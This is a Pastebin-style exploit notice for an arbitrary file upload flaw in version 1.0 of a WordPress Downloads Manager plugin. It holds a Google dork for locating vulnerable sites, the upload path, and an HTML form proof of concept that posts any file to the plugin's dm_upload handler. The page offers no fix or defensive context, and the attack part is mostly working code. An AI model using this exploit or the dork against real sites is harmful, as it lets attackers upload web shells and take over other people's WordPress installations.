Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!--
- \ \ / (_)_ __ _ _ ___\ \/ / _ \ ____
- \ \ / /| | '__| | | / __|\ /| | | |_ /
- \ V / | | | | |_| \__ \/ \| |_| |/ /
- \_/ |_|_| \__,_|___/_/\_\____//___|
- -->
- #########################################################
- # Exploit Title: Wordpress Downloads Manager Arbitrary File Upload Vulnerability
- # Category: webapps
- # version affected : 1.0
- # Google Dork : inurl:wp-content/plugins/downloads-manager/
- # Index of /wp-content/plugins/downloads-manager
- ########################################################
- -------------------------------------------------------------------------------
- #
- #
- # File Path
- #
- # /wp-content/plugins/downloads-manager/upload/
- #
- # [-]Proof of Concept
- -------------------------------------------------------------------------------
- <html>
- <body>
- <form action="http://[path to WordPress]" method="POST" enctype="multipart/form-data">
- <input type="hidden" name="dm_upload" />
- <input type="file" name="upfile" />
- <input type="submit" value="Submit" />
- </form>
- </body>
- </html>
- -------------------------------------------------------------------------------
- video
- https://youtu.be/rJ-0OgZnmeg
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement